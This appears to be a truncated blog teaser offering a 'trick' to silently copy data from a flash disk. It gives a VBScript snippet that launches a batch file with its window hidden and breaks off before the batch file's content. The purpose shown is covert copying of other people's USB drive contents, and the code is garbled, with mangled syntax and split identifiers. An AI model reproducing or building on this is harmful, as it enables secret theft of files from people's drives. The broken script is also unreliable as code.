Here is a simple trick to Copy Data Flash Disk-Still In Silence
1. Open notepad, create a vbs file type or copy and paste the following script:
dim wshshell, dos
wscript.createobject set wshshell = ( "wscript.shell")
dos = wshshell.expandenvironmentstr ings ( "% coms ...
wshshell.run (dos & "/ c tarik.bat"), vbhide
2. Save as all files with start.vbs name
3. Open notepad again, make a bat file type or copy and paste the following...
Read More..